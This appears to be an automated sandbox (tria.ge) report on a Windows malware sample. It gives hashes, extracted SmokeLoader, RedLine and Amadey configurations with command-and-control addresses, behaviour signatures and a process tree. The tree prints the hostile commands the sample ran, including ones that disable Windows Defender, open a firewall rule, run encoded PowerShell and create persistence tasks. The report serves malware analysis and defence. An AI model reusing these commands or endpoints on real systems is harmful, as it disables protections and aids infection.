Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    130s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    24/10/2023, 12:46 UTC

General

  • Target

    0f8287b2b0848e2ae154d429cf523c1f.exe

  • Size

    1.3MB

  • MD5

    0f8287b2b0848e2ae154d429cf523c1f

  • SHA1

    965fedc4a3644badba431429e5911ca9103e4ad5

  • SHA256

    5779207515cf9fcdee8d4fc24b6c372f8dff076176467a2c0f5e67c50a556b2d

  • SHA512

    c6952afc238df8407dbe55d6e015440adf97c54a7a9845c9fc3e1e388f74980ea875bc8857e07ffbdb61146e6d29c0a48f18fdedbc6e9d245936f624bf11cb44

  • SSDEEP

    24576:TysymOZQcH2tsEOxiKMOYyju6krePdi1ol4xnpFUcqFhbOT:mlDZQrOEOYK75qJrePdi1olETqF

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://77.91.68.29/fks/

rc4.i32
1
0x4b3b02b6
rc4.i32
1
0x6ea683ed

Extracted

Family

redline

Botnet

grome

C2

77.91.124.86:19084

Extracted

Family

amadey

Version

3.89

C2

http://77.91.124.1/theme/index.php

Attributes
  • install_dir

    fefffe8cea

  • install_file

    explothe.exe

  • strings_key

    36a96139c1118a354edf72b1080d4b2f

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

redline

Botnet

kinza

C2

77.91.124.86:19084

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 6 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected google phishing page
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 4 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 50 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 15 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1212
    • C:\Users\Admin\AppData\Local\Temp\0f8287b2b0848e2ae154d429cf523c1f.exe
      "C:\Users\Admin\AppData\Local\Temp\0f8287b2b0848e2ae154d429cf523c1f.exe"
      2⤵
      • DcRat
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NM4ao47.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NM4ao47.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TP8gu74.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TP8gu74.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yO2Xp75.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yO2Xp75.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gk0KZ27.exe
              C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gk0KZ27.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:2844
              • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FK03Kj9.exe
                C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FK03Kj9.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2732
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  8⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2324
              • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2FX2793.exe
                C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2FX2793.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2636
            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3YK35pP.exe
              C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3YK35pP.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:2908
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ye774YH.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ye774YH.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            PID:1740
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              6⤵
                PID:2168
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                6⤵
                  PID:772
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  6⤵
                    PID:808
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5SE7xM1.exe
                C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5SE7xM1.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2684
                • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2436
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
                    6⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:1100
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
                    6⤵
                      PID:1704
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        7⤵
                          PID:1720
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "explothe.exe" /P "Admin:N"
                          7⤵
                            PID:1712
                          • C:\Windows\SysWOW64\cacls.exe
                            CACLS "explothe.exe" /P "Admin:R" /E
                            7⤵
                              PID:2560
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              7⤵
                                PID:884
                              • C:\Windows\SysWOW64\cacls.exe
                                CACLS "..\fefffe8cea" /P "Admin:N"
                                7⤵
                                  PID:2808
                                • C:\Windows\SysWOW64\cacls.exe
                                  CACLS "..\fefffe8cea" /P "Admin:R" /E
                                  7⤵
                                    PID:2280
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                  6⤵
                                    PID:2712
                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6ny4mL7.exe
                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6ny4mL7.exe
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1664
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CB99.tmp\CB9A.tmp\CB9B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6ny4mL7.exe"
                                4⤵
                                  PID:2000
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login
                                    5⤵
                                    • Modifies Internet Explorer settings
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1948
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1948 CREDAT:275457 /prefetch:2
                                      6⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:836
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1948 CREDAT:209953 /prefetch:2
                                      6⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2552
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1948 CREDAT:209955 /prefetch:2
                                      6⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1556
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1948 CREDAT:603164 /prefetch:2
                                      6⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:680
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
                                    5⤵
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:1308
                            • C:\Users\Admin\AppData\Local\Temp\F844.exe
                              C:\Users\Admin\AppData\Local\Temp\F844.exe
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              PID:2000
                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xv9vA5wK.exe
                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xv9vA5wK.exe
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:1600
                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\cL1ZB5XM.exe
                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\cL1ZB5XM.exe
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  PID:616
                                  • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xL8yb3ZT.exe
                                    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xL8yb3ZT.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Adds Run key to start application
                                    PID:2980
                                    • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vN5hj9hU.exe
                                      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vN5hj9hU.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      PID:2556
                                      • C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1xb93ou0.exe
                                        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1xb93ou0.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        PID:2716
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                          8⤵
                                            PID:1496
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            8⤵
                                              PID:1708
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 268
                                                9⤵
                                                • Program crash
                                                PID:2308
                                          • C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ia647Db.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ia647Db.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:604
                                • C:\Users\Admin\AppData\Local\Temp\F94E.exe
                                  C:\Users\Admin\AppData\Local\Temp\F94E.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2224
                                • C:\Windows\system32\cmd.exe
                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FCD8.bat" "
                                  2⤵
                                    PID:2252
                                  • C:\Users\Admin\AppData\Local\Temp\FEEB.exe
                                    C:\Users\Admin\AppData\Local\Temp\FEEB.exe
                                    2⤵
                                    • Executes dropped EXE
                                    PID:1752
                                  • C:\Users\Admin\AppData\Local\Temp\36E.exe
                                    C:\Users\Admin\AppData\Local\Temp\36E.exe
                                    2⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • Executes dropped EXE
                                    • Windows security modification
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2212
                                  • C:\Users\Admin\AppData\Local\Temp\6C9.exe
                                    C:\Users\Admin\AppData\Local\Temp\6C9.exe
                                    2⤵
                                    • Executes dropped EXE
                                    PID:2840
                                  • C:\Users\Admin\AppData\Local\Temp\9D6.exe
                                    C:\Users\Admin\AppData\Local\Temp\9D6.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:112
                                  • C:\Users\Admin\AppData\Local\Temp\7279.exe
                                    C:\Users\Admin\AppData\Local\Temp\7279.exe
                                    2⤵
                                    • Executes dropped EXE
                                    PID:2320
                                    • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                                      • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                        4⤵
                                        • Windows security bypass
                                        • Executes dropped EXE
                                        • Windows security modification
                                        • Adds Run key to start application
                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                        • Drops file in Windows directory
                                        • Modifies data under HKEY_USERS
                                        PID:2756
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                          5⤵
                                            PID:1356
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                              6⤵
                                              • Modifies Windows Firewall
                                              • Modifies data under HKEY_USERS
                                              PID:1028
                                          • C:\Windows\rss\csrss.exe
                                            C:\Windows\rss\csrss.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2796
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                              6⤵
                                              • DcRat
                                              • Creates scheduled task(s)
                                              PID:1664
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /delete /tn ScheduledUpdate /f
                                              6⤵
                                                PID:1384
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                6⤵
                                                • Executes dropped EXE
                                                PID:268
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:2168
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1368
                                          • C:\Users\Admin\AppData\Local\Temp\7zS8037.tmp\Install.exe
                                            .\Install.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2964
                                            • C:\Users\Admin\AppData\Local\Temp\7zS8315.tmp\Install.exe
                                              .\Install.exe /MKdidA "385119" /S
                                              5⤵
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in System32 directory
                                              • Enumerates system info in registry
                                              PID:3068
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                6⤵
                                                  PID:2936
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                    7⤵
                                                      PID:2956
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                        8⤵
                                                          PID:2920
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                          8⤵
                                                            PID:1380
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                        6⤵
                                                          PID:2400
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                            7⤵
                                                              PID:2560
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                8⤵
                                                                  PID:2264
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  8⤵
                                                                    PID:2460
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gRwqIgawP" /SC once /ST 04:01:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                6⤵
                                                                • DcRat
                                                                • Creates scheduled task(s)
                                                                PID:2632
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gRwqIgawP"
                                                                6⤵
                                                                  PID:2412
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gRwqIgawP"
                                                                  6⤵
                                                                    PID:2468
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 12:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\oqNlToo.exe\" 3Y /lvsite_idohu 385119 /S" /V1 /F
                                                                    6⤵
                                                                    • DcRat
                                                                    • Drops file in Windows directory
                                                                    • Creates scheduled task(s)
                                                                    PID:1064
                                                            • C:\Users\Admin\AppData\Local\Temp\whateveraddition.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\whateveraddition.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Adds Run key to start application
                                                              PID:2744
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /c 3hime.bat
                                                                4⤵
                                                                  PID:2528
                                                                • C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\whiterapidpro1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\whiterapidpro1.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  PID:3020
                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\whiterapidpro.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\whiterapidpro.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:1188
                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1372
                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe
                                                                        7⤵
                                                                          PID:1832
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=1504863 "C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe" & erase "C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiterapid.exe" & exit
                                                                            8⤵
                                                                              PID:1420
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /nobreak /t 3
                                                                                9⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:2240
                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiiterapid.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\whiiterapid.exe
                                                                          6⤵
                                                                            PID:1792
                                                                    • C:\Users\Admin\AppData\Local\Temp\kos2.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:864
                                                                      • C:\Users\Admin\AppData\Local\Temp\set16.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\set16.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:1672
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0BE49.tmp\is-5760H.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0BE49.tmp\is-5760H.tmp" /SL4 $102F4 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:1588
                                                                          • C:\Program Files (x86)\MyBurn\MyBurn.exe
                                                                            "C:\Program Files (x86)\MyBurn\MyBurn.exe" -i
                                                                            6⤵
                                                                              PID:1460
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              "C:\Windows\system32\net.exe" helpmsg 20
                                                                              6⤵
                                                                                PID:112
                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                  C:\Windows\system32\net1 helpmsg 20
                                                                                  7⤵
                                                                                    PID:2768
                                                                                • C:\Program Files (x86)\MyBurn\MyBurn.exe
                                                                                  "C:\Program Files (x86)\MyBurn\MyBurn.exe" -s
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2704
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\system32\schtasks.exe" /Query
                                                                                  6⤵
                                                                                    PID:2740
                                                                              • C:\Users\Admin\AppData\Local\Temp\K.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\K.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2668
                                                                            • C:\Users\Admin\AppData\Local\Temp\latestX.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
                                                                              3⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              • Drops file in Drivers directory
                                                                              • Executes dropped EXE
                                                                              • Drops file in Program Files directory
                                                                              PID:2832
                                                                          • C:\Users\Admin\AppData\Local\Temp\749C.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\749C.exe
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:1496
                                                                          • C:\Users\Admin\AppData\Local\Temp\772C.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\772C.exe
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1492
                                                                          • C:\Users\Admin\AppData\Local\Temp\7E3F.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\7E3F.exe
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:2288
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\system32\rundll32.exe faeeecbcfb.sys,#1
                                                                              3⤵
                                                                                PID:2192
                                                                            • C:\Users\Admin\AppData\Local\Temp\DC85.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\DC85.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
